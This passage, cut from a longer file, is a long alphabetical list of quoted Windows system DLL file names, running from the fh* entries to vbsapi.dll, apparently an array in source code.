"fhcleanup.dll", "fhcpl.dll", "fhengine.dll", "fhevents.dll", "fhshl.dll", "fhsrchapi.dll", "fhsrchph.dll", "fhsvc.dll", "fhsvcctl.dll", "fhtask.dll", "fhuxadapter.dll", "fhuxapi.dll", "fhuxcommon.dll", "fhuxgraphics.dll", "fhuxpresentation.dll", "fidocredprov.dll", "filemgmt.dll", "filterds.dll", "findnetprinters.dll", "firewallapi.dll", "flightsettings.dll", "fltlib.dll", "fluencyds.dll", "fmapi.dll", "fmifs.dll", "fms.dll", "fntcache.dll", "fontext.dll", "fontprovider.dll", "fontsub.dll", "fphc.dll", "framedyn.dll", "framedynos.dll", "frameserver.dll", "frprov.dll", "fsutilext.dll", "fthsvc.dll", "fundisc.dll", "fveapi.dll", "fveapibase.dll", "fvecerts.dll", "fvecpl.dll", "fveskybackup.dll", "fveui.dll", "fvewiz.dll", "fwbase.dll", "fwcfg.dll", "fwmdmcsp.dll", "fwpolicyiomgr.dll", "fwpuclnt.dll", "fwremotesvr.dll", "gameinput.dll", "gamemode.dll", "gamestreamingext.dll", "gameux.dll", "gamingtcui.dll", "gcdef.dll", "gdi32.dll", "gdi32full.dll", "gdiplus.dll", "generaltel.dll", "geocommon.dll", "geolocation.dll", "getuname.dll", "glmf32.dll", "globinputhost.dll", "glu32.dll", "gmsaclient.dll", "gpapi.dll", "gpcsewrappercsp.dll", "gpedit.dll", "gpprefcl.dll", "gpprnext.dll", "gpscript.dll", "gpsvc.dll", "gptext.dll", "graphicscapture.dll", "graphicsperfsvc.dll", "groupinghc.dll", "hal.dll", "halextpl080.dll", "hascsp.dll", "hashtagds.dll", "hbaapi.dll", "hcproviders.dll", "hdcphandler.dll", "heatcore.dll", "helppaneproxy.dll", "hgcpl.dll", "hhsetup.dll", "hid.dll", "hidcfu.dll", "hidserv.dll", "hlink.dll", "hmkd.dll", "hnetcfg.dll", "hnetcfgclient.dll", "hnetmon.dll", "hologramworld.dll", "holoshellruntime.dll", "holoshextensions.dll", "hotplug.dll", "hrtfapo.dll", "httpapi.dll", "httpprxc.dll", "httpprxm.dll", "httpprxp.dll", "httpsdatasource.dll", "htui.dll", "hvhostsvc.dll", "hvloader.dll", "hvsigpext.dll", "hvsocket.dll", "hydrogen.dll", "ia2comproxy.dll", "ias.dll", "iasacct.dll", "iasads.dll", "iasdatastore.dll", "iashlpr.dll", "iasmigplugin.dll", "iasnap.dll", "iaspolcy.dll", "iasrad.dll", "iasrecst.dll", "iassam.dll", "iassdo.dll", "iassvcs.dll", "icfupgd.dll", "icm32.dll", "icmp.dll", "icmui.dll", "iconcodecservice.dll", "icsigd.dll", "icsvc.dll", "icsvcext.dll", "icu.dll", "icuin.dll", "icuuc.dll", "idctrls.dll", "idlisten.dll", "idndl.dll", "idstore.dll", "ieadvpack.dll", "ieapfltr.dll", "iedkcs32.dll", "ieframe.dll", "iemigplugin.dll", "iepeers.dll", "ieproxy.dll", "iernonce.dll", "iertutil.dll", "iesetup.dll", "iesysprep.dll", "ieui.dll", "ifmon.dll", "ifsutil.dll", "ifsutilx.dll", "igddiag.dll", "ihds.dll", "ikeext.dll", "imagehlp.dll", "imageres.dll", "imagesp1.dll", "imapi.dll", "imapi2.dll", "imapi2fs.dll", "imgutil.dll", "imm32.dll", "implatsetup.dll", "indexeddblegacy.dll", "inetcomm.dll", "inetmib1.dll", "inetpp.dll", "inetppui.dll", "inetres.dll", "inked.dll", "inkobjcore.dll", "inproclogger.dll", "input.dll", "inputcloudstore.dll", "inputcontroller.dll", "inputhost.dll", "inputservice.dll", "inputswitch.dll", "inseng.dll", "installservice.dll", "internetmail.dll", "internetmailcsp.dll", "invagent.dll", "iologmsg.dll", "iphlpapi.dll", "iphlpsvc.dll", "ipnathlp.dll", "ipnathlpclient.dll", "ippcommon.dll", "ippcommonproxy.dll", "iprtprio.dll", "iprtrmgr.dll", "ipsecsnp.dll", "ipsecsvc.dll", "ipsmsnap.dll", "ipxlatcfg.dll", "iri.dll", "iscsicpl.dll", "iscsidsc.dll", "iscsied.dll", "iscsiexe.dll", "iscsilog.dll", "iscsium.dll", "iscsiwmi.dll", "iscsiwmiv2.dll", "ism.dll", "itircl.dll", "itss.dll", "iuilp.dll", "iumbase.dll", "iumcrypt.dll", "iumdll.dll", "iumsdk.dll", "iyuv_32.dll", "joinproviderol.dll", "joinutil.dll", "jpmapcontrol.dll", "jpndecoder.dll", "jpninputrouter.dll", "jpnranker.dll", "jpnserviceds.dll", "jscript.dll", "jscript9.dll", "jscript9diag.dll", "jsproxy.dll", "kbd101.dll", "kbd101a.dll", "kbd101b.dll", "kbd101c.dll", "kbd103.dll", "kbd106.dll", "kbd106n.dll", "kbda1.dll", "kbda2.dll", "kbda3.dll", "kbdadlm.dll", "kbdal.dll", "kbdarme.dll", "kbdarmph.dll", "kbdarmty.dll", "kbdarmw.dll", "kbdax2.dll", "kbdaze.dll", "kbdazel.dll", "kbdazst.dll", "kbdbash.dll", "kbdbe.dll", "kbdbene.dll", "kbdbgph.dll", "kbdbgph1.dll", "kbdbhc.dll", "kbdblr.dll", "kbdbr.dll", "kbdbu.dll", "kbdbug.dll", "kbdbulg.dll", "kbdca.dll", "kbdcan.dll", "kbdcher.dll", "kbdcherp.dll", "kbdcr.dll", "kbdcz.dll", "kbdcz1.dll", "kbdcz2.dll", "kbdda.dll", "kbddiv1.dll", "kbddiv2.dll", "kbddv.dll", "kbddzo.dll", "kbdes.dll", "kbdest.dll", "kbdfa.dll", "kbdfar.dll", "kbdfc.dll", "kbdfi.dll", "kbdfi1.dll", "kbdfo.dll", "kbdfr.dll", "kbdfthrk.dll", "kbdgae.dll", "kbdgeo.dll", "kbdgeoer.dll", "kbdgeome.dll", "kbdgeooa.dll", "kbdgeoqw.dll", "kbdgkl.dll", "kbdgn.dll", "kbdgr.dll", "kbdgr1.dll", "kbdgrlnd.dll", "kbdgthc.dll", "kbdhau.dll", "kbdhaw.dll", "kbdhe.dll", "kbdhe220.dll", "kbdhe319.dll", "kbdheb.dll", "kbdhebl3.dll", "kbdhela2.dll", "kbdhela3.dll", "kbdhept.dll", "kbdhu.dll", "kbdhu1.dll", "kbdibm02.dll", "kbdibo.dll", "kbdic.dll", "kbdinasa.dll", "kbdinbe1.dll", "kbdinbe2.dll", "kbdinben.dll", "kbdindev.dll", "kbdinen.dll", "kbdinguj.dll", "kbdinhin.dll", "kbdinkan.dll", "kbdinmal.dll", "kbdinmar.dll", "kbdinori.dll", "kbdinpun.dll", "kbdintam.dll", "kbdintel.dll", "kbdinuk2.dll", "kbdir.dll", "kbdit.dll", "kbdit142.dll", "kbdiulat.dll", "kbdjav.dll", "kbdjpn.dll", "kbdkaz.dll", "kbdkhmr.dll", "kbdkni.dll", "kbdkor.dll", "kbdkurd.dll", "kbdkyr.dll", "kbdla.dll", "kbdlao.dll", "kbdlisub.dll", "kbdlisus.dll", "kbdlk41a.dll", "kbdlt.dll", "kbdlt1.dll", "kbdlt2.dll", "kbdlv.dll", "kbdlv1.dll", "kbdlvst.dll", "kbdmac.dll", "kbdmacst.dll", "kbdmaori.dll", "kbdmlt47.dll", "kbdmlt48.dll", "kbdmon.dll", "kbdmonmo.dll", "kbdmonst.dll", "kbdmyan.dll", "kbdne.dll", "kbdnec.dll", "kbdnec95.dll", "kbdnecat.dll", "kbdnecnt.dll", "kbdnepr.dll", "kbdnko.dll", "kbdno.dll", "kbdno1.dll", "kbdnso.dll", "kbdntl.dll", "kbdogham.dll", "kbdolch.dll", "kbdoldit.dll", "kbdosa.dll", "kbdosm.dll", "kbdpash.dll", "kbdphags.dll", "kbdpl.dll", "kbdpl1.dll", "kbdpo.dll", "kbdro.dll", "kbdropr.dll", "kbdrost.dll", "kbdru.dll", "kbdru1.dll", "kbdrum.dll", "kbdsf.dll", "kbdsg.dll", "kbdsl.dll", "kbdsl1.dll", "kbdsmsfi.dll", "kbdsmsno.dll", "kbdsn1.dll", "kbdsora.dll", "kbdsorex.dll", "kbdsors1.dll", "kbdsorst.dll", "kbdsp.dll", "kbdsw.dll", "kbdsw09.dll", "kbdsyr1.dll", "kbdsyr2.dll", "kbdtaile.dll", "kbdtajik.dll", "kbdtam99.dll", "kbdtat.dll", "kbdth0.dll", "kbdth1.dll", "kbdth2.dll", "kbdth3.dll", "kbdtifi.dll", "kbdtifi2.dll", "kbdtiprc.dll", "kbdtiprd.dll", "kbdtt102.dll", "kbdtuf.dll", "kbdtuq.dll", "kbdturme.dll", "kbdtzm.dll", "kbdughr.dll", "kbdughr1.dll", "kbduk.dll", "kbdukx.dll", "kbdur.dll", "kbdur1.dll", "kbdurdu.dll", "kbdus.dll", "kbdusa.dll", "kbdusl.dll", "kbdusr.dll", "kbdusx.dll", "kbduzb.dll", "kbdvntc.dll", "kbdwol.dll", "kbdyak.dll", "kbdyba.dll", "kbdycc.dll", "kbdycl.dll", "kd.dll", "kdcom.dll", "kdcpw.dll", "kdhvcom.dll", "kdnet.dll", "kdnet_uart16550.dll", "kdscli.dll", "kdstub.dll", "kdusb.dll", "kd_02_10df.dll", "kd_02_10ec.dll", "kd_02_1137.dll", "kd_02_14e4.dll", "kd_02_15b3.dll", "kd_02_1969.dll", "kd_02_19a2.dll", "kd_02_1af4.dll", "kd_02_8086.dll", "kd_07_1415.dll", "kd_0c_8086.dll", "kerbclientshared.dll", "kerberos.dll", "kernel32.dll", "kernelbase.dll", "keycredmgr.dll", "keyiso.dll", "keymgr.dll", "knobscore.dll", "knobscsp.dll", "ksuser.dll", "ktmw32.dll", "l2gpstore.dll", "l2nacp.dll", "l2sechc.dll", "laprxy.dll", "legacynetux.dll", "lfsvc.dll", "libcrypto.dll", "licensemanager.dll", "licensingcsp.dll", "licensingdiagspp.dll", "licensingwinrt.dll", "licmgr10.dll", "linkinfo.dll", "lltdapi.dll", "lltdres.dll", "lltdsvc.dll", "lmhsvc.dll", "loadperf.dll", "localsec.dll", "localspl.dll", "localui.dll", "locationapi.dll", "lockappbroker.dll", "lockcontroller.dll", "lockscreendata.dll", "loghours.dll", "logoncli.dll", "logoncontroller.dll", "lpasvc.dll", "lpk.dll", "lsasrv.dll", "lscshostpolicy.dll", "lsm.dll", "lsmproxy.dll", "lstelemetry.dll", "luainstall.dll", "luiapi.dll", "lz32.dll", "magnification.dll", "maintenanceui.dll", "manageci.dll", "mapconfiguration.dll", "mapcontrolcore.dll", "mapgeocoder.dll", "mapi32.dll", "mapistub.dll", "maprouter.dll", "mapsbtsvc.dll", "mapsbtsvcproxy.dll", "mapscsp.dll", "mapsstore.dll", "mapstoasttask.dll", "mapsupdatetask.dll", "mbaeapi.dll", "mbaeapipublic.dll", "mbaexmlparser.dll", "mbmediamanager.dll", "mbsmsapi.dll", "mbussdapi.dll", "mccsengineshared.dll", "mccspal.dll", "mciavi32.dll", "mcicda.dll", "mciqtz32.dll", "mciseq.dll", "mciwave.dll", "mcrecvsrc.dll", "mdmcommon.dll", "mdmdiagnostics.dll", "mdminst.dll", "mdmmigrator.dll", "mdmregistration.dll", "memorydiagnostic.dll", "messagingservice.dll", "mf.dll", "mf3216.dll", "mfaacenc.dll", "mfasfsrcsnk.dll", "mfaudiocnv.dll", "mfc42.dll", "mfc42u.dll", "mfcaptureengine.dll", "mfcore.dll", "mfcsubs.dll", "mfds.dll", "mfdvdec.dll", "mferror.dll", "mfh263enc.dll", "mfh264enc.dll", "mfksproxy.dll", "mfmediaengine.dll", "mfmjpegdec.dll", "mfmkvsrcsnk.dll", "mfmp4srcsnk.dll", "mfmpeg2srcsnk.dll", "mfnetcore.dll", "mfnetsrc.dll", "mfperfhelper.dll", "mfplat.dll", "mfplay.dll", "mfps.dll", "mfreadwrite.dll", "mfsensorgroup.dll", "mfsrcsnk.dll", "mfsvr.dll", "mftranscode.dll", "mfvdsp.dll", "mfvfw.dll", "mfwmaaec.dll", "mgmtapi.dll", "mi.dll", "mibincodec.dll", "midimap.dll", "migisol.dll", "miguiresource.dll", "mimefilt.dll", "mimofcodec.dll", "minstoreevents.dll", "miracastinputmgr.dll", "miracastreceiver.dll", "mirrordrvcompat.dll", "mispace.dll", "mitigationclient.dll", "miutils.dll", "mlang.dll", "mmcbase.dll", "mmcndmgr.dll", "mmcshext.dll", "mmdevapi.dll", "mmgaclient.dll", "mmgaproxystub.dll", "mmres.dll", "mobilenetworking.dll", "modemui.dll", "modernexecserver.dll", "moricons.dll", "moshost.dll", "moshostclient.dll", "moshostcore.dll", "mosstorage.dll", "mp3dmod.dll", "mp43decd.dll", "mp4sdecd.dll", "mpeval.dll", "mpg4decd.dll", "mpr.dll", "mprapi.dll", "mprddm.dll", "mprdim.dll", "mprext.dll", "mprmsg.dll", "mpssvc.dll", "mpunits.dll", "mrmcorer.dll", "mrmdeploy.dll", "mrmindexer.dll", "mrt100.dll", "mrt_map.dll", "msaatext.dll", "msac3enc.dll", "msacm32.dll", "msafd.dll", "msajapi.dll", "msalacdecoder.dll", "msalacencoder.dll", "msamrnbdecoder.dll", "msamrnbencoder.dll", "msamrnbsink.dll", "msamrnbsource.dll", "msasn1.dll", "msauddecmft.dll", "msaudite.dll", "msauserext.dll", "mscandui.dll", "mscat32.dll", "msclmd.dll", "mscms.dll", "mscoree.dll", "mscorier.dll", "mscories.dll", "msctf.dll", "msctfmonitor.dll", "msctfp.dll", "msctfui.dll", "msctfuimanager.dll", "msdadiag.dll", "msdart.dll", "msdelta.dll", "msdmo.dll", "msdrm.dll", "msdtckrm.dll", "msdtclog.dll", "msdtcprx.dll", "msdtcspoffln.dll", "msdtctm.dll", "msdtcuiu.dll", "msdtcvsp1res.dll", "msfeeds.dll", "msfeedsbs.dll", "msflacdecoder.dll", "msflacencoder.dll", "msftedit.dll", "msheif.dll", "mshtml.dll", "mshtmldac.dll", "mshtmled.dll", "mshtmler.dll", "msi.dll", "msicofire.dll", "msidcrl40.dll", "msident.dll", "msidle.dll", "msidntld.dll", "msieftp.dll", "msihnd.dll", "msiltcfg.dll", "msimg32.dll", "msimsg.dll", "msimtf.dll", "msisip.dll", "msiso.dll", "msiwer.dll", "mskeyprotcli.dll", "mskeyprotect.dll", "msls31.dll", "msmpeg2adec.dll", "msmpeg2enc.dll", "msmpeg2vdec.dll", "msobjs.dll", "msoert2.dll", "msopusdecoder.dll", "mspatcha.dll", "mspatchc.dll", "msphotography.dll", "msports.dll", "msprivs.dll", "msrahc.dll", "msrating.dll", "msrawimage.dll", "msrdc.dll", "msrdpwebaccess.dll", "msrle32.dll", "msscntrs.dll", "mssecuser.dll", "mssign32.dll", "mssip32.dll", "mssitlb.dll", "mssph.dll", "mssprxy.dll", "mssrch.dll", "mssvp.dll", "mstask.dll", "mstextprediction.dll", "mstscax.dll", "msutb.dll", "msv1_0.dll", "msvcirt.dll", "msvcp110_win.dll", "msvcp120_clr0400.dll", "msvcp140_clr0400.dll", "msvcp60.dll", "msvcp_win.dll", "msvcr100_clr0400.dll", "msvcr120_clr0400.dll", "msvcrt.dll", "msvfw32.dll", "msvidc32.dll", "msvidctl.dll", "msvideodsp.dll", "msvp9dec.dll", "msvproc.dll", "msvpxenc.dll", "mswb7.dll", "mswebp.dll", "mswmdm.dll", "mswsock.dll", "msxml3.dll", "msxml3r.dll", "msxml6.dll", "msxml6r.dll", "msyuv.dll", "mtcmodel.dll", "mtf.dll", "mtfappserviceds.dll", "mtfdecoder.dll", "mtffuzzyds.dll", "mtfserver.dll", "mtfspellcheckds.dll", "mtxclu.dll", "mtxdm.dll", "mtxex.dll", "mtxoci.dll", "muifontsetup.dll", "mycomput.dll", "mydocs.dll", "napcrypt.dll", "napinsp.dll", "naturalauth.dll", "naturallanguage6.dll", "navshutdown.dll", "ncaapi.dll", "ncasvc.dll", "ncbservice.dll", "ncdautosetup.dll", "ncdprop.dll", "nci.dll", "ncobjapi.dll", "ncrypt.dll", "ncryptprov.dll", "ncryptsslp.dll", "ncsi.dll", "ncuprov.dll", "nddeapi.dll", "ndfapi.dll", "ndfetw.dll", "ndfhcdiscovery.dll", "ndishc.dll", "ndproxystub.dll", "nduprov.dll", "negoexts.dll", "netapi32.dll", "netbios.dll", "netcenter.dll", "netcfgx.dll", "netcorehc.dll", "netdiagfx.dll", "netdriverinstall.dll", "netevent.dll", "netfxperf.dll", "neth.dll", "netid.dll", "netiohlp.dll", "netjoin.dll", "netlogon.dll", "netman.dll", "netmsg.dll", "netplwiz.dll", "netprofm.dll", "netprofmsvc.dll", "netprovfw.dll", "netprovisionsp.dll", "netsetupapi.dll", "netsetupengine.dll", "netsetupshim.dll", "netsetupsvc.dll", "netshell.dll", "nettrace.dll", "netutils.dll", "networkexplorer.dll", "networkhelper.dll", "networkicon.dll", "networkproxycsp.dll", "networkstatus.dll", "networkuxbroker.dll", "newdev.dll", "nfcradiomedia.dll", "ngccredprov.dll", "ngcctnr.dll", "ngcctnrsvc.dll", "ngcisoctnr.dll", "ngckeyenum.dll", "ngcksp.dll", "ngclocal.dll", "ngcpopkeysrv.dll", "ngcprocsp.dll", "ngcrecovery.dll", "ngcsvc.dll", "ngctasks.dll", "ninput.dll", "nlaapi.dll", "nlahc.dll", "nlasvc.dll", "nlhtml.dll", "nlmgp.dll", "nlmproxy.dll", "nlmsprep.dll", "nlsbres.dll", "nlsdata0000.dll", "nlsdata0009.dll", "nlsdl.dll", "nlslexicons0009.dll", "nmadirect.dll", "normaliz.dll", "npmproxy.dll", "npsm.dll", "nrpsrv.dll", "nshhttp.dll", "nshipsec.dll", "nshwfp.dll", "nsi.dll", "nsisvc.dll", "ntasn1.dll", "ntdll.dll", "ntdsapi.dll", "ntlanman.dll", "ntlanui2.dll", "ntlmshared.dll", "ntmarta.dll", "ntprint.dll", "ntshrui.dll", "ntvdm64.dll", "objsel.dll", "occache.dll", "ocsetapi.dll", "odbc32.dll", "odbcbcp.dll", "odbcconf.dll", "odbccp32.dll", "odbccr32.dll", "odbccu32.dll", "odbcint.dll", "odbctrac.dll", "oemlicense.dll", "offfilt.dll", "officecsp.dll", "offlinelsa.dll", "offlinesam.dll", "offreg.dll", "ole32.dll", "oleacc.dll", "oleacchooks.dll", "oleaccrc.dll", "oleaut32.dll", "oledlg.dll", "oleprn.dll", "omadmagent.dll", "omadmapi.dll", "onebackuphandler.dll", "onex.dll", "onexui.dll", "opcservices.dll", "opengl32.dll", "ortcengine.dll", "osbaseln.dll", "osksupport.dll", "osuninst.dll", "p2p.dll", "p2pgraph.dll", "p2pnetsh.dll", "p2psvc.dll", "packager.dll", "panmap.dll", "pautoenr.dll", "pcacli.dll", "pcadm.dll", "pcaevts.dll", "pcasvc.dll", "pcaui.dll", "pcpksp.dll", "pcsvdevice.dll", "pcwum.dll", "pcwutl.dll", "pdh.dll", "pdhui.dll", "peerdist.dll", "peerdistad.dll", "peerdistcleaner.dll", "peerdistsh.dll", "peerdistsvc.dll", "peopleapis.dll", "peopleband.dll", "perceptiondevice.dll", "perfctrs.dll", "perfdisk.dll", "perfnet.dll", "perfos.dll", "perfproc.dll", "perfts.dll", "phoneom.dll", "phoneproviders.dll", "phoneservice.dll", "phoneserviceres.dll", "phoneutil.dll", "phoneutilres.dll", "photowiz.dll", "pickerplatform.dll", "pid.dll", "pidgenx.dll", "pifmgr.dll", "pimstore.dll", "pkeyhelper.dll", "pktmonapi.dll", "pku2u.dll", "pla.dll", "playlistfolder.dll", "playsndsrv.dll", "playtodevice.dll", "playtomanager.dll", "playtomenu.dll", "playtoreceiver.dll", "ploptin.dll", "pmcsnap.dll", "pngfilt.dll", "pnidui.dll", "pnpclean.dll", "pnppolicy.dll", "pnpts.dll", "pnpui.dll", "pnpxassoc.dll", "pnpxassocprx.dll", "pnrpauto.dll", "pnrphc.dll", "pnrpnsp.dll", "pnrpsvc.dll", "policymanager.dll", "polstore.dll", "posetup.dll", "posyncservices.dll", "pots.dll", "powercpl.dll", "powrprof.dll", "ppcsnap.dll", "prauthproviders.dll", "prflbmsg.dll", "printui.dll", "printwsdahost.dll", "prm0009.dll", "prncache.dll", "prnfldr.dll", "prnntfy.dll", "prntvpt.dll", "profapi.dll", "profext.dll", "profprov.dll", "profsvc.dll", "profsvcext.dll", "propsys.dll", "provcore.dll", "provdatastore.dll", "provdiagnostics.dll", "provengine.dll", "provhandlers.dll", "provisioningcsp.dll", "provmigrate.dll", "provops.dll", "provplugineng.dll", "provsysprep.dll", "provthrd.dll", "proximitycommon.dll", "proximityservice.dll", "prvdmofcomp.dll", "psapi.dll", "pshed.dll", "psisdecd.dll", "psmsrv.dll", "pstask.dll", "pstorec.dll", "ptpprov.dll", "puiapi.dll", "puiobj.dll", "pushtoinstall.dll", "pwlauncher.dll", "pwrshplugin.dll", "pwsso.dll", "qasf.dll", "qcap.dll", "qdv.dll", "qdvd.dll", "qedit.dll", "qedwipes.dll", "qmgr.dll", "query.dll", "quiethours.dll", "qwave.dll", "racengn.dll", "racpldlg.dll", "radardt.dll", "radarrs.dll", "radcui.dll", "rasadhlp.dll", "rasapi32.dll", "rasauto.dll", "raschap.dll", "raschapext.dll", "rasctrs.dll", "rascustom.dll", "rasdiag.dll", "rasdlg.dll", "rasgcw.dll", "rasman.dll", "rasmans.dll", "rasmbmgr.dll", "rasmediamanager.dll", "rasmm.dll", "rasmontr.dll", "rasplap.dll", "rasppp.dll", "rastapi.dll", "rastls.dll", "rastlsext.dll", "rdbui.dll", "rdpbase.dll", "rdpcfgex.dll", "rdpcore.dll", "rdpcorets.dll", "rdpencom.dll", "rdpendp.dll", "rdpnano.dll", "rdpsaps.dll", "rdpserverbase.dll", "rdpsharercom.dll", "rdpudd.dll", "rdpviewerax.dll", "rdsappxhelper.dll", "rdsdwmdr.dll", "rdvvmtransport.dll", "rdxservice.dll", "rdxtaskfactory.dll", "reagent.dll", "reagenttask.dll", "recovery.dll", "regapi.dll", "regctrl.dll", "regidle.dll", "regsvc.dll", "reguwpapi.dll", "reinfo.dll", "remotepg.dll", "remotewipecsp.dll", "reportingcsp.dll", "resampledmo.dll", "resbparser.dll", "reseteng.dll", "resetengine.dll", "resetengonline.dll", "resourcemapper.dll", "resutils.dll", "rgb9rast.dll", "riched20.dll", "riched32.dll", "rjvmdmconfig.dll", "rmapi.dll", "rmclient.dll", "rnr20.dll", "roamingsecurity.dll", "rometadata.dll", "rotmgr.dll", "rpcepmap.dll", "rpchttp.dll", "rpcns4.dll", "rpcnsh.dll", "rpcrt4.dll", "rpcrtremote.dll", "rpcss.dll", "rsaenh.dll", "rshx32.dll", "rstrtmgr.dll", "rtffilt.dll", "rtm.dll", "rtmediaframe.dll", "rtmmvrortc.dll", "rtutils.dll", "rtworkq.dll", "rulebasedds.dll", "samcli.dll", "samlib.dll", "samsrv.dll", "sas.dll", "sbe.dll", "sbeio.dll", "sberes.dll", "sbservicetrigger.dll", "scansetting.dll", "scardbi.dll", "scarddlg.dll", "scardsvr.dll", "scavengeui.dll", "scdeviceenum.dll", "scecli.dll", "scesrv.dll", "schannel.dll", "schedcli.dll", "schedsvc.dll", "scksp.dll", "scripto.dll", "scrobj.dll", "scrptadm.dll", "scrrun.dll", "sdcpl.dll", "sdds.dll", "sdengin2.dll", "sdfhost.dll", "sdhcinst.dll", "sdiageng.dll", "sdiagprv.dll", "sdiagschd.dll", "sdohlp.dll", "sdrsvc.dll", "sdshext.dll", "searchfolder.dll", "sechost.dll", "seclogon.dll", "secproc.dll", "secproc_isv.dll", "secproc_ssp.dll", "secproc_ssp_isv.dll", "secur32.dll", "security.dll", "semgrps.dll", "semgrsvc.dll", "sendmail.dll", "sens.dll", "sensapi.dll", "sensorsapi.dll", "sensorscpl.dll", "sensorservice.dll", "sensorsnativeapi.dll", "sensorsutilsv2.dll", "sensrsvc.dll", "serialui.dll", "servicinguapi.dll", "serwvdrv.dll", "sessenv.dll", "setbcdlocale.dll", "settingmonitor.dll", "settingsync.dll", "settingsynccore.dll", "setupapi.dll", "setupcl.dll", "setupcln.dll", "setupetw.dll", "sfc.dll", "sfc_os.dll", "sgrmenclave.dll", "shacct.dll", "shacctprofile.dll", "sharedpccsp.dll", "sharedrealitysvc.dll", "sharehost.dll", "sharemediacpl.dll", "shcore.dll", "shdocvw.dll", "shell32.dll", "shellstyle.dll", "shfolder.dll", "shgina.dll", "shimeng.dll", "shimgvw.dll", "shlwapi.dll", "shpafact.dll", "shsetup.dll", "shsvcs.dll", "shunimpl.dll", "shutdownext.dll", "shutdownux.dll", "shwebsvc.dll", "signdrv.dll", "simauth.dll", "simcfg.dll", "skci.dll", "slc.dll", "slcext.dll", "slwga.dll", "smartscreenps.dll", "smbhelperclass.dll", "smbwmiv2.dll", "smiengine.dll", "smphost.dll", "smsroutersvc.dll", "sndvolsso.dll", "snmpapi.dll", "socialapis.dll", "softkbd.dll", "softpub.dll", "sortwindows61.dll", "sortwindows62.dll", "spacebridge.dll", "spacecontrol.dll", "spatializerapo.dll", "spatialstore.dll", "spbcd.dll", "speechpal.dll", "spfileq.dll", "spinf.dll", "spmpm.dll", "spnet.dll", "spoolss.dll", "spopk.dll", "spp.dll", "sppc.dll", "sppcext.dll", "sppcomapi.dll", "sppcommdlg.dll", "sppinst.dll", "sppnp.dll", "sppobjs.dll", "sppwinob.dll", "sppwmi.dll", "spwinsat.dll", "spwizeng.dll", "spwizimg.dll", "spwizres.dll", "spwmp.dll", "sqlsrv32.dll", "sqmapi.dll", "srchadmin.dll", "srclient.dll", "srcore.dll", "srevents.dll", "srh.dll", "srhelper.dll", "srm.dll", "srmclient.dll", "srmlib.dll", "srmscan.dll", "srmshell.dll", "srmstormod.dll", "srmtrace.dll", "srm_ps.dll", "srpapi.dll", "srrstr.dll", "srumapi.dll", "srumsvc.dll", "srvcli.dll", "srvsvc.dll", "srwmi.dll", "sscore.dll", "sscoreext.dll", "ssdm.dll", "ssdpapi.dll", "ssdpsrv.dll", "sspicli.dll", "sspisrv.dll", "ssshim.dll", "sstpsvc.dll", "starttiledata.dll", "startupscan.dll", "stclient.dll", "sti.dll", "sti_ci.dll", "stobject.dll", "storageusage.dll", "storagewmi.dll", "storewuauth.dll", "storprop.dll", "storsvc.dll", "streamci.dll", "structuredquery.dll", "sud.dll", "svf.dll", "svsvc.dll", "swprv.dll", "sxproxy.dll", "sxs.dll", "sxshared.dll", "sxssrv.dll", "sxsstore.dll", "synccenter.dll", "synccontroller.dll", "synchostps.dll", "syncproxy.dll", "syncreg.dll", "syncres.dll", "syncsettings.dll", "syncutil.dll", "sysclass.dll", "sysfxui.dll", "sysmain.dll", "sysntfy.dll", "syssetup.dll", "systemcpl.dll", "t2embed.dll", "tabbtn.dll", "tabbtnex.dll", "tabsvc.dll", "tapi3.dll", "tapi32.dll", "tapilua.dll", "tapimigplugin.dll", "tapiperf.dll", "tapisrv.dll", "tapisysprep.dll", "tapiui.dll", "taskapis.dll", "taskbarcpl.dll", "taskcomp.dll", "taskschd.dll", "taskschdps.dll", "tbauth.dll", "tbs.dll", "tcbloader.dll", "tcpipcfg.dll", "tcpmib.dll", "tcpmon.dll", "tcpmonui.dll", "tdh.dll", "tdlmigration.dll", "tellib.dll", "termmgr.dll", "termsrv.dll", "tetheringclient.dll", "tetheringmgr.dll", "tetheringservice.dll", "tetheringstation.dll", "textshaping.dll", "themecpl.dll", "themeservice.dll", "themeui.dll", "threadpoolwinrt.dll", "thumbcache.dll", "timebrokerclient.dll", "timebrokerserver.dll", "timesync.dll", "timesynctask.dll", "tlscsp.dll", "tokenbinding.dll", "tokenbroker.dll", "tokenbrokerui.dll", "tpmcertresources.dll", "tpmcompc.dll", "tpmtasks.dll", "tpmvsc.dll", "tquery.dll", "traffic.dll", "transportdsa.dll", "trie.dll", "trkwks.dll", "tsbyuv.dll", "tscfgwmi.dll", "tserrredir.dll", "tsf3gip.dll", "tsgqec.dll", "tsmf.dll", "tspkg.dll", "tspubwmi.dll", "tssessionux.dll", "tssrvlic.dll", "tsworkspace.dll", "ttdloader.dll", "ttdplm.dll", "ttdrecord.dll", "ttdrecordcpu.dll", "ttlsauth.dll", "ttlscfg.dll", "ttlsext.dll", "tvratings.dll", "twext.dll", "twinapi.dll", "twinui.dll", "txflog.dll", "txfw32.dll", "tzautoupdate.dll", "tzres.dll", "tzsyncres.dll", "ubpm.dll", "ucmhc.dll", "ucrtbase.dll", "ucrtbase_clr0400.dll", "ucrtbase_enclave.dll", "udhisapi.dll", "udwm.dll", "ueficsp.dll", "uexfat.dll", "ufat.dll", "uiamanager.dll", "uianimation.dll", "uiautomationcore.dll", "uicom.dll", "uireng.dll", "uiribbon.dll", "uiribbonres.dll", "ulib.dll", "umb.dll", "umdmxfrm.dll", "umpdc.dll", "umpnpmgr.dll", "umpo-overrides.dll", "umpo.dll", "umpoext.dll", "umpowmi.dll", "umrdp.dll", "unattend.dll", "unenrollhook.dll", "unimdmat.dll", "uniplat.dll", "unistore.dll", "untfs.dll", "updateagent.dll", "updatecsp.dll", "updatepolicy.dll", "upnp.dll", "upnphost.dll", "upshared.dll", "urefs.dll", "urefsv1.dll", "ureg.dll", "url.dll", "urlmon.dll", "usbcapi.dll", "usbceip.dll", "usbmon.dll", "usbperf.dll", "usbpmapi.dll", "usbtask.dll", "usbui.dll", "user32.dll", "usercpl.dll", "userdataservice.dll", "userdatatimeutil.dll", "userenv.dll", "userinitext.dll", "usermgr.dll", "usermgrcli.dll", "usermgrproxy.dll", "usoapi.dll", "usocoreps.dll", "usosvc.dll", "usp10.dll", "ustprov.dll", "utcutil.dll", "utildll.dll", "uudf.dll", "uvcmodel.dll", "uwfcfgmgmt.dll", "uwfcsp.dll", "uwfservicingapi.dll", "uxinit.dll", "uxlib.dll", "uxlibres.dll", "uxtheme.dll", "vac.dll", "van.dll", "vault.dll", "vaultcds.dll", "vaultcli.dll", "vaultroaming.dll", "vaultsvc.dll", "vbsapi.dll", 